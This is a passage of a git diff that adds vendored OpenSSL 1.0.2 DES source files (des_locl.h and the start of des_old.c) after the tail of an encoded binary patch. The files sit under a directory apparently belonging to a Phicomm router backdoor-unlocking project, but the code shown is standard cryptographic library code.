zJlf!4tP~6m41ju!y9P#kx`Y~kEvS6#8K-^WkO!YvAv+y++S8cEGSk!TbKet=-I=!j
z7>HFMen3}MgY>?m2DHG+bEtl(t5qlt4}3?4NpDuYk+yZ`f__ZzH!!`AXDYoRZ+R!C
z_XoPx>6OC|UfU4n_Oo<g$A+1)Y)1-n`$M3Z+kYdd#QeG?(I0z}Aw9QeW3KM!+<pdA
zc^K2u0I>-}W^Uh04qZzdva6m6-l&q9JRD-&Y8<eQ!ym$BO%S=@jaU)rPIyKOVv4^n
zaS2_WpWXGLmoqAjljb)ZwK_WR&oa9a!A^-_oI%X0SHmEBj2{Cjv%8*C{Aw5Tr-5IH
zuq@II$pq(l76107mt;(ldd%_$^{NRX1M3B6Objuvo%Va)Q)en4+s!|FOh=sG=iI*<
zEQ~0FT+P5Ioc5KR>pHw>1Jhqtsw_GKZTEZ#2F(9`16S$5&Q-5*$?h-Dw7tfdW-Glj
zjOpCSY1aIuvSdG#iD2ZMLs<VF-FEy-(*9jh@!GtO71LtqZ#`##i(WN||6oc3JC*6k
zCdX&XrzO!J&i%G?@2<JU>-ZyR!QwvYK`-*AOnR>D9I<n)%E$Jj!jjW2>pAux5C_qv
zM$44J*a*fKg|QKg3uO^F%|&2*TK!NKf%zpCfn^1Y08RMKdSWqTKw?aTl$A+Y-l*p>
zkc9_yFbPa{l)+<U^(zKq0WVbuqp(pBdW;S!8&8Og@PZiHV^oJSz}YBml*U;Gv$h$S
zE^Ct5DYmfz(kKTSbkm+tCw0YJ;wds%EpdFsQ}|BBTUfVJf}tGOxL_!gH)VLi2n4+3
zfeiHlgDf8M3XK?Ks2eaof|D1R(MKIE#5HDk!EWrKjA=t-<P{sGT{2PzAJH+=AF-9Z
zut9VQ54a!~=Y2M6MWXmv7XBMf6#u}8HwzJz1t1m$jXZdhmt|mhX_gTk!Xs*_hdlU#
z95`7P5sGOnlq13>MYm~B+6F8<qNc#Uygjr<1ZbNSrM*J?wXMc()2_4^jT!gI2$B#H
zPsL+!Z%jgkvbYv?IG1ISkx&YcgoVzRkp_K~l~54Fhfk;r6zZi8@(>rjx=d<{t+7o!
zLem<kOSdU9;FDIsB)USIs8`z|c-U@Um$66pN%t4*+JlK`B$luuF?cS9GGtH&ErAj~
zz)>bmcu2z|e1efi_ZwL)lK><#S~qH<-|(`GHnmPo8`U1#%(tuC({|Ao>eu$L%m=i*
zZP1AaeW1<xK2b*aNCU4GOIcP+N>CCKx(q@pVYQGOZ+sFhpjmkECcn^HfCCa9%C(@v
zs+E$r=ps)GKztyV$kV8kyn>OY%fv(u5FXI+O&WAk2ioF?Iuk4dH)WwwANj!x98^3B
z@BmAJ2ALL36O6iAL`fO=%JgiH*5M5Ss}3LiM53gTCnY?jMWhUjG?XpMP*z09Pv_SO
z9sw>gz{o@12-@SLY1GRPu@pWbO=F=v2%1LS)CE3iPi$bh4!VsFV+%3i4ec{_Y5P-j
zR!hRN?n|_oMxhkt7ASAQo47m)@Bl5tN8ZGNQ8vVYh^)u}=W`#w65yjOWXRtFh(?CG
zbsgWJ6C;f>eApK4C`&*F?-pWsQwzU|-IrhuACxI4_5q=cV4zV(Y(bgr&<<_4HRsxE
z|0Ge}c-y*F&Fd21uBok=ex-fYI;q<CertNo^ch!Zn4<76K3tISyAx~9cN%GJC$VyT
z_)O6+EAp4$wIX-NBVU~~KK4+=vQogmW@z1)qA;%_{*$u0imC_8ud7IOMAH@34~%mw
zrvK=Y*%dR}#+P4yX~lG>qS~!UfXA(f*H!4%?^dJZt;s0Nrj9w(;f>beh>qQpLmlag
zsyeMB0kN${M*?<PnTq%WWo|{)kIKt_rdjAjtIP0QMxN{l&%=ht1ANl(Y-i`i7PRwV
zc{*>)9QH?SaVs8*l;2ZcG1C!~>ZDu7B#XLcvK>6*=uFWiz7bt@^i83zha=^$j-gAG
zl=!0hsP*P>2@+yw8ZRQ2=c78BP%fijG{#!FjEYh?m+|wTa%;l*Adqrv;utvocw6**
z0rklR_RH7;R)x<OVNVO*@)#46sE|M8lW_#hHu#g53%4a>1I23${_^i@T*d>6*Bd-?
zg~nwJptt}Zy<uxS{9ZE#-UgiZ{OdH$De-4<Y17(8O{<pFEV115jV!HMe`m8Tl^g4u
z*DPMOwvh0x!b+`FmNtoquB=*e+mcX;wP;RuUY(O&G;j9o8`BMo8l1XpdXcqg(c0$4
zOO`KMvTXUH?=QY%h1R&VsdiDJ>~b?yxJuFY=WwIrv%!R{82`Ch5Q_0vevh5xDl}Tp
z^~TSf29xj!^*4@z-!=w*XElWJ6zjQX4E)Dq;9E_6sfS$*?V0xn)UNI4S{UMk1~2Bn
z?wi6c_7v**f{A-E|5XO3f2g11na@uP_`isH*zWCD3R(2?e`<&LH)}K=>Y1UdR+quq
zZXy3wf2bLVSKt%siA^t!PcwL^zh1Lh|5(6ZXs01d+$poGz+a>h<L5sNZl-M>-)eA<
z4L%|NPYoW|a31e4c(^Zx{4E9#{Tkxy3?A-PdEEFtQKWyZ!IMS!N`sqWmAB`1gPT_#
zZ!&;!TOMCx@Gx$nJqry!v#8yFF>$@R2>)Ayr;6}agS$oeT7!E<_#Fn%7U2sF9>zbk
z^9F-A6!EV&9i3l<uQfQ=Q9hxb<p#f1&=Guz!Iu`{w;Fs|5&q`}Ur~gA*WigF+*GY%
z{o($xt%yI|Kb|YX!~NrI5gzUzR~M|S>~pvuST$?cuWVj?8{W-p^m|!YTGO;*aZPj6
z-OX0b(#6e-t(x1`uC;0eU9(yvOIEL3*|Z7_t5!ER)!@K(r7ZHMe*3C*HFvIAeP`2}
z=JiIfY1yLhuUWjZ$(Z@EUkPYn*Dfj2lrr^yH+~Pv#V3)kf)K?g6*8Fj4oT+%r?c=(
z!iTakR`7)Ln%g<?@O(-dpEE`6YE<)vWxl83L!BR0{*NKc_Kle+nTH1sJT0NYx@slN
zJA9F?RR7P;(i{&L^q>1gs4nb3&o6AhxVtUi*79as(iOwY3T61r!6z&WV7~s%$QNQP
z7xUf>Y&<^2{oi5a6QC77q5UDY8U^YsmOo(RTZ$Simj3}{OZo4iI^DuU`X%FMBFdqB
z=)Y2JQ>6Y+wP2TNpL=L2d7f~K#||Z{%=rBWRtlb??%)htT0U{D7Fu5*%VM$o{{j3E
BKH>lX

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_locl.h
new file mode 100644
index 0000000..23ea9d3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_locl.h
@@ -0,0 +1,443 @@
+/* crypto/des/des_locl.h */
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_DES_LOCL_H
+# define HEADER_DES_LOCL_H
+
+# include <openssl/e_os2.h>
+
+# if defined(OPENSSL_SYS_WIN32)
+#  ifndef OPENSSL_SYS_MSDOS
+#   define OPENSSL_SYS_MSDOS
+#  endif
+# endif
+
+# include <stdio.h>
+# include <stdlib.h>
+
+# ifndef OPENSSL_SYS_MSDOS
+#  if !defined(OPENSSL_SYS_VMS) || defined(__DECC)
+#   ifdef OPENSSL_UNISTD
+#    include OPENSSL_UNISTD
+#   else
+#    include <unistd.h>
+#   endif
+#   include <math.h>
+#  endif
+# endif
+# include <openssl/des.h>
+
+# ifdef OPENSSL_SYS_MSDOS       /* Visual C++ 2.1 (Windows NT/95) */
+#  include <stdlib.h>
+#  include <errno.h>
+#  include <time.h>
+#  include <io.h>
+# endif
+
+# if defined(__STDC__) || defined(OPENSSL_SYS_VMS) || defined(M_XENIX) || defined(OPENSSL_SYS_MSDOS)
+#  include <string.h>
+# endif
+
+# ifdef OPENSSL_BUILD_SHLIBCRYPTO
+#  undef OPENSSL_EXTERN
+#  define OPENSSL_EXTERN OPENSSL_EXPORT
+# endif
+
+# define ITERATIONS 16
+# define HALF_ITERATIONS 8
+
+/* used in des_read and des_write */
+# define MAXWRITE        (1024*16)
+# define BSIZE           (MAXWRITE+4)
+
+# define c2l(c,l)        (l =((DES_LONG)(*((c)++)))    , \
+                         l|=((DES_LONG)(*((c)++)))<< 8L, \
+                         l|=((DES_LONG)(*((c)++)))<<16L, \
+                         l|=((DES_LONG)(*((c)++)))<<24L)
+
+/* NOTE - c is not incremented as per c2l */
+# define c2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((DES_LONG)(*(--(c))))<<24L; \
+                        case 7: l2|=((DES_LONG)(*(--(c))))<<16L; \
+                        case 6: l2|=((DES_LONG)(*(--(c))))<< 8L; \
+                        case 5: l2|=((DES_LONG)(*(--(c))));     \
+                        case 4: l1 =((DES_LONG)(*(--(c))))<<24L; \
+                        case 3: l1|=((DES_LONG)(*(--(c))))<<16L; \
+                        case 2: l1|=((DES_LONG)(*(--(c))))<< 8L; \
+                        case 1: l1|=((DES_LONG)(*(--(c))));     \
+                                } \
+                        }
+
+# define l2c(l,c)        (*((c)++)=(unsigned char)(((l)     )&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>24L)&0xff))
+
+/*
+ * replacements for htonl and ntohl since I have no idea what to do when
+ * faced with machines with 8 byte longs.
+ */
+# define HDRSIZE 4
+
+# define n2l(c,l)        (l =((DES_LONG)(*((c)++)))<<24L, \
+                         l|=((DES_LONG)(*((c)++)))<<16L, \
+                         l|=((DES_LONG)(*((c)++)))<< 8L, \
+                         l|=((DES_LONG)(*((c)++))))
+
+# define l2n(l,c)        (*((c)++)=(unsigned char)(((l)>>24L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)     )&0xff))
+
+/* NOTE - c is not incremented as per l2c */
+# define l2cn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)>>24L)&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>>16L)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>> 8L)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)     )&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)>>24L)&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>>16L)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>> 8L)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)     )&0xff); \
+                                } \
+                        }
+
+# if (defined(OPENSSL_SYS_WIN32) && defined(_MSC_VER))
+#  define ROTATE(a,n)     (_lrotr(a,n))
+# elif defined(__ICC)
+#  define ROTATE(a,n)     (_rotr(a,n))
+# elif defined(__GNUC__) && __GNUC__>=2 && !defined(__STRICT_ANSI__) && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM) && !defined(PEDANTIC)
+#  if defined(__i386) || defined(__i386__) || defined(__x86_64) || defined(__x86_64__)
+#   define ROTATE(a,n)   ({ register unsigned int ret;   \
+                                asm ("rorl %1,%0"       \
+                                        : "=r"(ret)     \
+                                        : "I"(n),"0"(a) \
+                                        : "cc");        \
+                           ret;                         \
+                        })
+#  endif
+# endif
+# ifndef ROTATE
+#  define ROTATE(a,n)     (((a)>>(n))+((a)<<(32-(n))))
+# endif
+
+/*
+ * Don't worry about the LOAD_DATA() stuff, that is used by fcrypt() to add
+ * it's little bit to the front
+ */
+
+# ifdef DES_FCRYPT
+
+#  define LOAD_DATA_tmp(R,S,u,t,E0,E1) \
+        { DES_LONG tmp; LOAD_DATA(R,S,u,t,E0,E1,tmp); }
+
+#  define LOAD_DATA(R,S,u,t,E0,E1,tmp) \
+        t=R^(R>>16L); \
+        u=t&E0; t&=E1; \
+        tmp=(u<<16); u^=R^s[S  ]; u^=tmp; \
+        tmp=(t<<16); t^=R^s[S+1]; t^=tmp
+# else
+#  define LOAD_DATA_tmp(a,b,c,d,e,f) LOAD_DATA(a,b,c,d,e,f,g)
+#  define LOAD_DATA(R,S,u,t,E0,E1,tmp) \
+        u=R^s[S  ]; \
+        t=R^s[S+1]
+# endif
+
+/*
+ * The changes to this macro may help or hinder, depending on the compiler
+ * and the architecture.  gcc2 always seems to do well :-). Inspired by Dana
+ * How <how@isl.stanford.edu> DO NOT use the alternative version on machines
+ * with 8 byte longs. It does not seem to work on the Alpha, even when
+ * DES_LONG is 4 bytes, probably an issue of accessing non-word aligned
+ * objects :-(
+ */
+# ifdef DES_PTR
+
+/*
+ * It recently occurred to me that 0^0^0^0^0^0^0 == 0, so there is no reason
+ * to not xor all the sub items together.  This potentially saves a register
+ * since things can be xored directly into L
+ */
+
+#  if defined(DES_RISC1) || defined(DES_RISC2)
+#   ifdef DES_RISC1
+#    define D_ENCRYPT(LL,R,S) { \
+        unsigned int u1,u2,u3; \
+        LOAD_DATA(R,S,u,t,E0,E1,u1); \
+        u2=(int)u>>8L; \
+        u1=(int)u&0xfc; \
+        u2&=0xfc; \
+        t=ROTATE(t,4); \
+        u>>=16L; \
+        LL^= *(const DES_LONG *)(des_SP      +u1); \
+        LL^= *(const DES_LONG *)(des_SP+0x200+u2); \
+        u3=(int)(u>>8L); \
+        u1=(int)u&0xfc; \
+        u3&=0xfc; \
+        LL^= *(const DES_LONG *)(des_SP+0x400+u1); \
+        LL^= *(const DES_LONG *)(des_SP+0x600+u3); \
+        u2=(int)t>>8L; \
+        u1=(int)t&0xfc; \
+        u2&=0xfc; \
+        t>>=16L; \
+        LL^= *(const DES_LONG *)(des_SP+0x100+u1); \
+        LL^= *(const DES_LONG *)(des_SP+0x300+u2); \
+        u3=(int)t>>8L; \
+        u1=(int)t&0xfc; \
+        u3&=0xfc; \
+        LL^= *(const DES_LONG *)(des_SP+0x500+u1); \
+        LL^= *(const DES_LONG *)(des_SP+0x700+u3); }
+#   endif
+#   ifdef DES_RISC2
+#    define D_ENCRYPT(LL,R,S) { \
+        unsigned int u1,u2,s1,s2; \
+        LOAD_DATA(R,S,u,t,E0,E1,u1); \
+        u2=(int)u>>8L; \
+        u1=(int)u&0xfc; \
+        u2&=0xfc; \
+        t=ROTATE(t,4); \
+        LL^= *(const DES_LONG *)(des_SP      +u1); \
+        LL^= *(const DES_LONG *)(des_SP+0x200+u2); \
+        s1=(int)(u>>16L); \
+        s2=(int)(u>>24L); \
+        s1&=0xfc; \
+        s2&=0xfc; \
+        LL^= *(const DES_LONG *)(des_SP+0x400+s1); \
+        LL^= *(const DES_LONG *)(des_SP+0x600+s2); \
+        u2=(int)t>>8L; \
+        u1=(int)t&0xfc; \
+        u2&=0xfc; \
+        LL^= *(const DES_LONG *)(des_SP+0x100+u1); \
+        LL^= *(const DES_LONG *)(des_SP+0x300+u2); \
+        s1=(int)(t>>16L); \
+        s2=(int)(t>>24L); \
+        s1&=0xfc; \
+        s2&=0xfc; \
+        LL^= *(const DES_LONG *)(des_SP+0x500+s1); \
+        LL^= *(const DES_LONG *)(des_SP+0x700+s2); }
+#   endif
+#  else
+#   define D_ENCRYPT(LL,R,S) { \
+        LOAD_DATA_tmp(R,S,u,t,E0,E1); \
+        t=ROTATE(t,4); \
+        LL^= \
+        *(const DES_LONG *)(des_SP      +((u     )&0xfc))^ \
+        *(const DES_LONG *)(des_SP+0x200+((u>> 8L)&0xfc))^ \
+        *(const DES_LONG *)(des_SP+0x400+((u>>16L)&0xfc))^ \
+        *(const DES_LONG *)(des_SP+0x600+((u>>24L)&0xfc))^ \
+        *(const DES_LONG *)(des_SP+0x100+((t     )&0xfc))^ \
+        *(const DES_LONG *)(des_SP+0x300+((t>> 8L)&0xfc))^ \
+        *(const DES_LONG *)(des_SP+0x500+((t>>16L)&0xfc))^ \
+        *(const DES_LONG *)(des_SP+0x700+((t>>24L)&0xfc)); }
+#  endif
+
+# else                          /* original version */
+
+#  if defined(DES_RISC1) || defined(DES_RISC2)
+#   ifdef DES_RISC1
+#    define D_ENCRYPT(LL,R,S) {\
+        unsigned int u1,u2,u3; \
+        LOAD_DATA(R,S,u,t,E0,E1,u1); \
+        u>>=2L; \
+        t=ROTATE(t,6); \
+        u2=(int)u>>8L; \
+        u1=(int)u&0x3f; \
+        u2&=0x3f; \
+        u>>=16L; \
+        LL^=DES_SPtrans[0][u1]; \
+        LL^=DES_SPtrans[2][u2]; \
+        u3=(int)u>>8L; \
+        u1=(int)u&0x3f; \
+        u3&=0x3f; \
+        LL^=DES_SPtrans[4][u1]; \
+        LL^=DES_SPtrans[6][u3]; \
+        u2=(int)t>>8L; \
+        u1=(int)t&0x3f; \
+        u2&=0x3f; \
+        t>>=16L; \
+        LL^=DES_SPtrans[1][u1]; \
+        LL^=DES_SPtrans[3][u2]; \
+        u3=(int)t>>8L; \
+        u1=(int)t&0x3f; \
+        u3&=0x3f; \
+        LL^=DES_SPtrans[5][u1]; \
+        LL^=DES_SPtrans[7][u3]; }
+#   endif
+#   ifdef DES_RISC2
+#    define D_ENCRYPT(LL,R,S) {\
+        unsigned int u1,u2,s1,s2; \
+        LOAD_DATA(R,S,u,t,E0,E1,u1); \
+        u>>=2L; \
+        t=ROTATE(t,6); \
+        u2=(int)u>>8L; \
+        u1=(int)u&0x3f; \
+        u2&=0x3f; \
+        LL^=DES_SPtrans[0][u1]; \
+        LL^=DES_SPtrans[2][u2]; \
+        s1=(int)u>>16L; \
+        s2=(int)u>>24L; \
+        s1&=0x3f; \
+        s2&=0x3f; \
+        LL^=DES_SPtrans[4][s1]; \
+        LL^=DES_SPtrans[6][s2]; \
+        u2=(int)t>>8L; \
+        u1=(int)t&0x3f; \
+        u2&=0x3f; \
+        LL^=DES_SPtrans[1][u1]; \
+        LL^=DES_SPtrans[3][u2]; \
+        s1=(int)t>>16; \
+        s2=(int)t>>24L; \
+        s1&=0x3f; \
+        s2&=0x3f; \
+        LL^=DES_SPtrans[5][s1]; \
+        LL^=DES_SPtrans[7][s2]; }
+#   endif
+
+#  else
+
+#   define D_ENCRYPT(LL,R,S) {\
+        LOAD_DATA_tmp(R,S,u,t,E0,E1); \
+        t=ROTATE(t,4); \
+        LL^=\
+                DES_SPtrans[0][(u>> 2L)&0x3f]^ \
+                DES_SPtrans[2][(u>>10L)&0x3f]^ \
+                DES_SPtrans[4][(u>>18L)&0x3f]^ \
+                DES_SPtrans[6][(u>>26L)&0x3f]^ \
+                DES_SPtrans[1][(t>> 2L)&0x3f]^ \
+                DES_SPtrans[3][(t>>10L)&0x3f]^ \
+                DES_SPtrans[5][(t>>18L)&0x3f]^ \
+                DES_SPtrans[7][(t>>26L)&0x3f]; }
+#  endif
+# endif
+
+        /*-
+         * IP and FP
+         * The problem is more of a geometric problem that random bit fiddling.
+         0  1  2  3  4  5  6  7      62 54 46 38 30 22 14  6
+         8  9 10 11 12 13 14 15      60 52 44 36 28 20 12  4
+        16 17 18 19 20 21 22 23      58 50 42 34 26 18 10  2
+        24 25 26 27 28 29 30 31  to  56 48 40 32 24 16  8  0
+
+        32 33 34 35 36 37 38 39      63 55 47 39 31 23 15  7
+        40 41 42 43 44 45 46 47      61 53 45 37 29 21 13  5
+        48 49 50 51 52 53 54 55      59 51 43 35 27 19 11  3
+        56 57 58 59 60 61 62 63      57 49 41 33 25 17  9  1
+
+        The output has been subject to swaps of the form
+        0 1 -> 3 1 but the odd and even bits have been put into
+        2 3    2 0
+        different words.  The main trick is to remember that
+        t=((l>>size)^r)&(mask);
+        r^=t;
+        l^=(t<<size);
+        can be used to swap and move bits between words.
+
+        So l =  0  1  2  3  r = 16 17 18 19
+                4  5  6  7      20 21 22 23
+                8  9 10 11      24 25 26 27
+               12 13 14 15      28 29 30 31
+        becomes (for size == 2 and mask == 0x3333)
+           t =   2^16  3^17 -- --   l =  0  1 16 17  r =  2  3 18 19
+                 6^20  7^21 -- --        4  5 20 21       6  7 22 23
+                10^24 11^25 -- --        8  9 24 25      10 11 24 25
+                14^28 15^29 -- --       12 13 28 29      14 15 28 29
+
+        Thanks for hints from Richard Outerbridge - he told me IP&FP
+        could be done in 15 xor, 10 shifts and 5 ands.
+        When I finally started to think of the problem in 2D
+        I first got ~42 operations without xors.  When I remembered
+        how to use xors :-) I got it to its final state.
+        */
+# define PERM_OP(a,b,t,n,m) ((t)=((((a)>>(n))^(b))&(m)),\
+        (b)^=(t),\
+        (a)^=((t)<<(n)))
+
+# define IP(l,r) \
+        { \
+        register DES_LONG tt; \
+        PERM_OP(r,l,tt, 4,0x0f0f0f0fL); \
+        PERM_OP(l,r,tt,16,0x0000ffffL); \
+        PERM_OP(r,l,tt, 2,0x33333333L); \
+        PERM_OP(l,r,tt, 8,0x00ff00ffL); \
+        PERM_OP(r,l,tt, 1,0x55555555L); \
+        }
+
+# define FP(l,r) \
+        { \
+        register DES_LONG tt; \
+        PERM_OP(l,r,tt, 1,0x55555555L); \
+        PERM_OP(r,l,tt, 8,0x00ff00ffL); \
+        PERM_OP(l,r,tt, 2,0x33333333L); \
+        PERM_OP(r,l,tt,16,0x0000ffffL); \
+        PERM_OP(l,r,tt, 4,0x0f0f0f0fL); \
+        }
+
+extern const DES_LONG DES_SPtrans[8][64];
+
+void fcrypt_body(DES_LONG *out, DES_key_schedule *ks,
+                 DES_LONG Eswap0, DES_LONG Eswap1);
+
+# ifdef OPENSSL_SMALL_FOOTPRINT
+#  undef DES_UNROLL
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.c
new file mode 100644
index 0000000..54b0968
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.c
@@ -0,0 +1,345 @@
+/* crypto/des/des_old.c -*- mode:C; c-file-style: "eay" -*- */
+
+/*-
+ * WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING
+ *
+ * The function names in here are deprecated and are only present to
+ * provide an interface compatible with libdes.  OpenSSL now provides
+ * functions where "des_" has been replaced with "DES_" in the names,
+ * to make it possible to make incompatible changes that are needed
+ * for C type security and other stuff.
+ *
+ * Please consider starting to use the DES_ functions rather than the
+ * des_ ones.  The des_ functions will dissapear completely before
+ * OpenSSL 1.0!
+ *
+ * WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING
+ */
+
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#define OPENSSL_DES_LIBDES_COMPATIBILITY
+#include <openssl/des.h>
+#include <openssl/rand.h>
+
+const char *_ossl_old_des_options(void)
+{
+    return DES_options();
+}
+
+void _ossl_old_des_ecb3_encrypt(_ossl_old_des_cblock *input,
+                                _ossl_old_des_cblock *output,
+                                des_key_schedule ks1, des_key_schedule ks2,
+                                des_key_schedule ks3, int enc)
+{
+    DES_ecb3_encrypt((const_DES_cblock *)input, output,
+                     (DES_key_schedule *)ks1, (DES_key_schedule *)ks2,
+                     (DES_key_schedule *)ks3, enc);
+}
+
+DES_LONG _ossl_old_des_cbc_cksum(_ossl_old_des_cblock *input,
+                                 _ossl_old_des_cblock *output, long length,
+                                 des_key_schedule schedule,
+                                 _ossl_old_des_cblock *ivec)
+{
+    return DES_cbc_cksum((unsigned char *)input, output, length,
+                         (DES_key_schedule *)schedule, ivec);
+}
+
+void _ossl_old_des_cbc_encrypt(_ossl_old_des_cblock *input,
+                               _ossl_old_des_cblock *output, long length,
+                               des_key_schedule schedule,
+                               _ossl_old_des_cblock *ivec, int enc)
+{
+    DES_cbc_encrypt((unsigned char *)input, (unsigned char *)output,
+                    length, (DES_key_schedule *)schedule, ivec, enc);
+}
+
+void _ossl_old_des_ncbc_encrypt(_ossl_old_des_cblock *input,
+                                _ossl_old_des_cblock *output, long length,
+                                des_key_schedule schedule,
+                                _ossl_old_des_cblock *ivec, int enc)
+{
+    DES_ncbc_encrypt((unsigned char *)input, (unsigned char *)output,
+                     length, (DES_key_schedule *)schedule, ivec, enc);
+}
+
+void _ossl_old_des_xcbc_encrypt(_ossl_old_des_cblock *input,
+                                _ossl_old_des_cblock *output, long length,
+                                des_key_schedule schedule,
+                                _ossl_old_des_cblock *ivec,
+                                _ossl_old_des_cblock *inw,
+                                _ossl_old_des_cblock *outw, int enc)
+{
